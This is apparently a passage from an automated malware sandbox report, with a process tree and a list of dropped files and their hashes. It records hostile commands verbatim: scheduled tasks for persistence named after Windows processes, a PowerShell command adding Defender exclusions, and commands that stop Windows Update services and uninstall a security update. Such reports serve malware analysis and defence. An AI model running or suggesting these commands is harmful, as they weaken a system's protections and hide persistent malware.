                                                                                                                                                                              schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:4848
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\ChainReview\RuntimeBroker.exe'" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:800
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\ChainReview\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:3692
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\ChainReview\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:4788
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Program Files\Common Files\System\sihost.exe'" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:2428
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Common Files\System\sihost.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:3460
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\System\sihost.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:760
                                                                                                                                                                            • C:\ProgramData\VC_redist.x64.exe
                                                                                                                                                                              C:\ProgramData\VC_redist.x64.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                              PID:4228
                                                                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                PID:1340
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:720
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2440
                                                                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3772
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:2868
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:3664
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:4952
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:1784
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:2012
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:4140
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:4908
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:4288
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:1992
                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:2216
                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                        C:\Windows\system32\conhost.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4000
                                                                                                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1816
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\service.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\service.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                          PID:1176
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:4020
                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                              schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                              PID:1576
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                          PID:5156
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffdccf1cc40,0x7ffdccf1cc4c,0x7ffdccf1cc58
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5204
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1868,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1864 /prefetch:2
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5424
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1964,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2160 /prefetch:3
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5400
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2464 /prefetch:8
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5480
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3176 /prefetch:1
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5668
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3380 /prefetch:1
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:1544
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3712,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4592 /prefetch:1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1716
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4848,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4860 /prefetch:8
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:3924
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,13628042722789916779,14194441089465509573,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4900 /prefetch:8
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4032
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2160
                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:1576

                                                                                                                                                                                                              Network

                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                              • C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                226B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                bb93bfa99237b0efc8e476af92d2882c

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                aa3285a0166dc7efe30a9156ea0d98af9f83651a

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                92820ca93b03d8c98ffeee165a92b6fa536abd34c97bb692b51e70f6f74dbeb0

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                40d8867fe2335315bd8de9da2571a0ba22e7760e5a6a9743a3aa611113406c0e4fc7f5b25986a18e58feb3e7e510923dc6320ae44fdce9ea02a467b3cab6ac70

                                                                                                                                                                                                              • C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                90B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                62a4289ada4d67fedd4d54ba96b5b228

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                c60573ddfd05111be1adf47d28cd04ecadd5eaef

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                6c4f31567a23e66fb38e0d495d8a0c2d4284d03ce58d3a45e7964a3f68035d50

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                d609dd9179a243fe2f89559276bd424490045e80d112f63c63b20271f1f63c0ad2d89bf256e2c0dfba29c37e2ba34bb7067e02388aa1490e22fc13660473d64a

                                                                                                                                                                                                              • C:\ChainReview\sphyperRuntimedhcpSvc.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                93457a02f578affc1800d7528c5370f3

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                fc79e5088c9df79bcd8e53d0b95661c3b5396806

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                ae70f0f9798da6edcd90c47a9a8019a36cdf35a3794a99cd14512d1a1994cbf5

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                4c077177207269bf7b5866376c59e84343b25093a4cf76e8e09cf17400962f97d86463cea4c83286d4451fd7810b3ad638972436adcba61ad57c3ba47e85ce2e

                                                                                                                                                                                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                452KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                c4d09d3b3516550ad2ded3b09e28c10c

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                7a5e77bb9ba74cf57cb1d119325b0b7f64199824

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2

                                                                                                                                                                                                              • C:\ProgramData\Microsoft\Windows\DevManView.cfg

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                43b37d0f48bad1537a4de59ffda50ffe

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82

                                                                                                                                                                                                              • C:\ProgramData\Microsoft\Windows\DevManView.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                162KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                33d7a84f8ef67fd005f37142232ae97e

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                1f560717d8038221c9b161716affb7cd6b14056e

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5

                                                                                                                                                                                                              • C:\ProgramData\Microsoft\Windows\Disk.bat

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                250e75ba9aac6e2e9349bdebc5ef104e

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                7efdaef5ec1752e7e29d8cc4641615d14ac1855f

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438

                                                                                                                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                165KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                81a45f1a91448313b76d2e6d5308aa7a

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                0d615343d5de03da03bce52e11b233093b404083

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

                                                                                                                                                                                                              • C:\ProgramData\Microsoft\Windows\amifldrv64.sys

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                18KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                785045f8b25cd2e937ddc6b09debe01a

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                029c678674f482ababe8bbfdb93152392457109d

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                2B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                d751713988987e9331980363e24189ce

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                356B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                dfa4cf686496cfbc559a1feed5cd032f

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                c9ebbfd1b610f1218f3278bae4e6cf24fc4c9075

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                187dc55795054afcba77798270b9bd2ced95cc659591ac6c56810261ff821e93

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                7c34518c7c0d68480dad4ee42c3a61c616d7236de453a61a1d0c2e0913da51cea17fff7b3068eb9a0308860c16745a7d25f359bb376deacc985de29befce1f94

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                b7ee42de5e93cf8da8d6e401ea7f7760

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                d66c4fa491c024ca5faf3e2eb2bff11205858b94

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                dd21c981a7cde4625e68df030440839b5555e06ea204bf5e0f95569e54e7498e

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                b6bfa83d51fa827d05cf2e96912629693fd1958b9a2c1ecaca8183a66ad7a6fe7366bab79b88108a835bca6a5226633898821de0ec1017cbae43db611442d8bb

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                3950a005f5cc97bcc99835e07ce2cc2d

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                7582a4e8a0729bef5fe7cf5dfd4d25d2d65503b8

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                ac92572414509fd8eb0dbb6689a1fc03df293a93ba5adad682a58b2cd83decb4

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                3c51e2e80d28908ab06baca23e20f9e01f0ff76332e7938cc7f4d751b357bb84ef60cc8c690226abc3c1bd7e57f2039ead202344f53cf379314799b22242c28d

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                d9cbe7ebab0271cc137a91e8447f25f7

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                b6791d41da60b09e8600f286d25efd6cefa3eb39

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                9bbf370b5fd7e3575a33515425432af0279e60a08efbc92b2858d098c821823c

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                ac4b7857fd00122df215d18bd6fbdf7345976eb0471f9b7b5f078809491df6db4104a364e51effe9a16b540d6fa2a7aa2b848a1abfe13d717da1c9b771d4c28d

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                195KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                eb9262ef772e055ce4c6543feb11721b

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                e9efa6f8df038d92b0a60a92d1a041dbba6ab5e4

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                39d202eef1c6f91fd7ef85ff44f1b33d2902084a55936d5302e99fc561556321

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                c75992b16d953ce8af35c28bcc27edaec61dd561af423dc6ec94e1b5ffb0fed2ac9dca562e0601b66c947a8022670197b4c01301ac7fde02ce150c44a20891d3

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                195KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                2479ecdc64e3cee91513b80fb9a71541

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                85c88b636411217ec9a060f0654bcf75a21a22a0

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                d22b7f189bbdc70797c2ac1bd3e5d2c082e354b65558f91194d2fc97c73142ed

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                f03e65d21350e93afb63fecfb9a21fb5969e10d69e4bea35bd63c9d6af9baa24e943cff87781e8e9a57145cbc3d2db732af7aadc2c9fe44b5dc5b7ae3858a8c7

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                19KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                9e33d4a7f2752b7a246cde4e78afb0bd

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                f269f46aa786a213685c68203ed38a74532966e3

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                33f34251737498caf8eaef71e180bcc5fcd0af9a1ad0e35c13a9cdecfd3fa8d5

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                24ac2812ed736156b081cb03b75f6110907d0fe761db4568b93a5b719140931b8cd3fe57da4120cbb542da1666e41c6c44da7c7921a73ab70be3d01318635ee6

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                948B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                a7ce8cefc3f798abe5abd683d0ef26dd

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Np1XZoUBqP.bat

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                251B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                f1be9b9fb6de02190dec333f35d31677

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                284f6b81fafae10a46131bb769fa9e4227474cac

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                c78ab40f3bbb38418fac63e456f8f173c58e4b05f2213903fba8d0664c2eddab

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                d8d3ee6d6942c09e4220e8356ef112fa8a6c0dd1b3285db6c9cde158995661cf79d04a96418539eea74336f1d4237ac69f5c0576073b0f9e5b894b4a6e1880dc

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f4zf03gd.ovl.ps1

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                60B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                SHA1

